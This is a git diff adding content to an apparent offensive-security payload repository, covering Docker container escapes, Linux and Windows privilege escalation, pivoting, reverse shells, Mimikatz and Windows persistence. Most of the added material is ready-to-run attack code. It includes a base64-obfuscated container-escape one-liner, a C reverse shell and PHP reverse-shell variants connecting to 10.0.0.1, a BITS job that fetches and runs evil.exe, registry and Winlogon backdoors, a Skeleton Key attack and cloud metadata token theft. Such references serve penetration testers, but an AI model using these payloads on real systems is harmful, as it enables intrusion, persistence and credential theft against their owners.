http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash +``` + +Access a private registry using OAuth Token from Google + +```powershell +curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email +curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token +docker login -e -u oauth2accesstoken -p "" https://gcr.io +``` + +## Exploit privileged container abusing the Linux cgroup v1 + +Prerequisite (at least one): + * `--privileged` + * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. + +```powershell +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -' +``` + +Exploit breakdown : + +```powershell +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` + +## Breaking out of Docker via runC + +> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team + +Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 + +```powershell +$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC +$ docker run --rm cve-2019-5736:malicious_image_POC +``` + +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + +## References + +- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) +- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) +- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) +- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) +- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e11bcee..5dad4e3 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,9 @@ * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](#sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) @@ -25,6 +28,7 @@ * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) * [Doas](#doas) * [sudo_inject](#sudo-inject) + * [CVE-2019-14287](#cve-2019-14287) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) * [Writable files](#writable-files) @@ -182,6 +186,61 @@ $ locate password | more ... ``` +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + ## Scheduled tasks ### Cron jobs @@ -331,6 +390,7 @@ uid=0(root) gid=1000(swissky) | CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | ## SUDO + Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) ### NOPASSWD @@ -401,6 +461,18 @@ uid=0(root) gid=0(root) groups=0(root) Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + +### CVE-2019-14287 + +```powershell +# Exploitable when a user have the following permissions (sudo -l) +(ALL, !root) ALL + +# If you have a full TTY, you can exploit it like this +sudo -u#-1 /bin/bash +sudo -u#4294967295 id +``` + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. @@ -434,11 +506,26 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn) List world writable files on the system. ```powershell -find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null find / -perm -2 -type f 2>/dev/null find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ``` +### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) + +/etc/sysconfig/network-scripts/ifcfg-1337 for example + +```powershell +NAME=Network /bin/id <= Note the blank space +ONBOOT=yes +DEVICE=eth0 + +EXEC : +./etc/sysconfig/network-scripts/ifcfg-1337 +``` +src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f] +(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) + ### Writable /etc/passwd First generate a password with one of the following commands. @@ -696,4 +783,5 @@ https://www.exploit-db.com/exploits/18411 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md new file mode 100644 index 0000000..1794178 --- /dev/null +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -0,0 +1,17 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 2fa5a50..cd4bc9e 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -12,6 +12,8 @@ * [Metasploit](#metasploit) * [sshuttle](#sshuttle) * [chisel](#chisel) + * [SharpChisel](#sharpchisel) +* [gost](#gost) * [Rpivot](#rpivot) * [RevSocks](#revsocks) * [plink](#plink) @@ -151,6 +153,12 @@ pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 ``` ## chisel @@ -164,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost: user@hacker$ /opt/chisel/chisel server -p 8008 --reverse ``` +### SharpChisel + +A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel + +```powershell +user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" +================================================================ +server : run the Server Component of chisel +-p 8080 : run server on port 8080 +--key "private": use "private" string to seed the generation of a ECDSA public and private key pair +--auth "user:pass" : Creds required to connect to the server +--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. +--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. + +user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks +``` + +## Gost + +> Wiki English : https://docs.ginuerzh.xyz/gost/en/ + +```powershell +git clone https://github.com/ginuerzh/gost +cd gost/cmd/gost +go build + +# Socks5 Proxy +Server side: gost -L=socks5://:1080 +Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true + +# Local Port Forward +gost -L=tcp://:2222/192.168.1.1:22 [-F=..] +``` + ## Rpivot Server (Attacker box) @@ -299,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) -* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) \ No newline at end of file +* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) +* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 9eb5efc..2617724 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -25,6 +25,7 @@ * [NodeJS](#nodejs) * [Groovy](#groovy) * [Groovy Alternative 1](#groovy-alternative-1) + * [C](#c) * [Meterpreter Shell](#meterpreter-shell) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) @@ -54,6 +55,8 @@ Listener: nc -u -lvp 4242 ``` +Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash + ### Socat ```powershell @@ -111,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 ```bash php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ```bash @@ -167,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s ``` +TLS-PSK (does not rely on PKI or self-signed certificates) +```bash +# generate 384-bit PSK +# use the generated string as a value for the two PSK variables from below +openssl rand -hex 48 +# server (attacker) +export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT +# client (victim) +export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE +``` + ### Powershell ```powershell @@ -292,6 +311,41 @@ Thread.start { } ``` +### C + +Compile with `gcc /tmp/shell.c --output csh && csh` + +```csharp +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = 4242; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + + return 0; +} +``` + ## Meterpreter Shell ### Windows Staged reverse TCP @@ -393,6 +447,19 @@ lua: os.execute('/bin/sh') - nmap: `!sh` - mysql: `! bash` +Alternative TTY method + +``` +www-data@debian:/dev/shm$ su - user +su: must be run from a terminal + +www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null +www-data@debian:/dev/shm$ su - user +Password: P4ssW0rD + +user@debian:~$ +``` + ## Fully interactive reverse shell on Windows The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index ff34988..46682b9 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -2,15 +2,16 @@ ## Summary -* [Mimikatz - Execute commands](#) -* [Mimikatz - Extract passwords](#) -* [Mimikatz - Mini Dump](#) -* [Mimikatz - Golden ticket](#) -* [Mimikatz - Skeleton key](#) -* [Mimikatz - RDP session takeover](#) -* [Mimikatz - Credential Manager & DPAPI](#) -* [Mimikatz - Commands list](#) -* [Mimikatz - Powershell version](#) +* [Mimikatz - Execute commands](#mimikatz---execute-commands) +* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) +* [Mimikatz - Mini Dump](#mimikatz---mini-dump) +* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) +* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) +* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) +* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) +* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Mimikatz - Commands list](#mimikatz---commands-list) +* [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) @@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ## Mimikatz - RDP session takeover +Use `ts::multirdp` to patch the RDP service to allow more than two users. + Run tscon.exe as the SYSTEM user, you can connect to any session without a password. ```powershell @@ -125,6 +128,8 @@ net start sesshijack ``` + + ## Mimikatz - Credential Manager & DPAPI ```powershell @@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +Task Scheduled credentials + +```powershell +mimikatz(commandline) # vault::cred /patch +TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / +UserName : DOMAIN\user +Comment : +Type : 2 - domain_password +Persist : 2 - local_machine +Flags : 00004004 +Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +Attributes : 0 +``` + + ## Mimikatz - Commands list | Command |Definition| diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5f0b5ac..c1fc028 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -6,17 +6,26 @@ * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) * [Userland](#userland) - * [Registry](#registry) + * [Registry HKCU](#registry-hkcu) * [Startup](#startup) * [Scheduled Task](#scheduled-task) + * [BITS Jobs](#bits-jobs) * [Serviceland](#serviceland) * [IIS](#iis) * [Windows Service](#windows-service) * [Elevated](#elevated) - * [HKLM](#hklm) + * [Registry HKLM](#registry-hklm) + * [Winlogon Helper DLL](#) + * [GlobalFlag](#) * [Services](#services) * [Scheduled Task](#scheduled-task) + * [Binary Replacement](#binary-replacement) + * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) + * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10) * [RDP Backdoor](#rdp-backdoor) + * [utilman.exe](#utilman.exe) + * [sethc.exe](#sethc.exe) + * [Skeleton Key](#skeleton-key) * [References](#references) @@ -59,6 +68,15 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +``` + Using SharPersist ```powershell @@ -104,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` + +### BITS Jobs + +```powershell +bitsadmin /create backdoor +bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe" + +# v1 +bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL +bitsadmin /SetMinRetryDelay "backdoor" 60 +bitsadmin /resume backdoor + +# v2 - exploit/multi/script/web_delivery +bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll" +bitsadmin /resume backdoor +``` + ## Serviceland ### IIS @@ -126,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som ## Elevated -### HKLM +### Registry HKLM Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. @@ -135,6 +170,41 @@ Value name: Backdoor Value data: C:\Windows\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +``` + +#### Winlogon Helper DLL + +> Run executable during Windows logon + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll + +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force +``` + + +#### GlobalFlag + +> Run executable after notepad is killed + +```powershell +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" +``` + + ### Services Create a service that will start automatically or on-demand. @@ -156,6 +226,29 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +### Binary Replacement + +#### Binary Replacement on Windows XP+ + +| Feature | Executable | +|---------------------|---------------------------------------| +| Sticky Keys | C:\Windows\System32\sethc.exe | +| Accessibility Menu | C:\Windows\System32\utilman.exe | +| On-Screen Keyboard | C:\Windows\System32\osk.exe | +| Magnifier | C:\Windows\System32\Magnify.exe | +| Narrator | C:\Windows\System32\Narrator.exe | +| Display Switcher | C:\Windows\System32\DisplaySwitch.exe | +| App Switcher | C:\Windows\System32\AtBroker.exe | + +In Metasploit : `use post/windows/manage/sticky_keys` + +#### Binary Replacement on Windows 10+ + +Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. + +Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. + + ### RDP Backdoor #### utilman.exe @@ -174,10 +267,25 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Skeleton Key + +```powershell +# Exploitation Command runned as DA: +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName + +# Access using the password "mimikatz" +Enter-PSSession -ComputerName -Credential \Administrator +``` ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) -* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) \ No newline at end of file +* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) +* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) +* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md) +* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) +* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) +* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) +* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 2b67480..7f77e38 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,13 +6,17 @@ * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) -* [AppLocker Enumeration](#applocker-enumeration) +* [Antivirus & Detections](#antivirus--detections) + * [Windows Defender](#windows-defender) + * [AppLocker Enumeration](#applocker-enumeration) + * [Powershell](#powershell) + * [Default 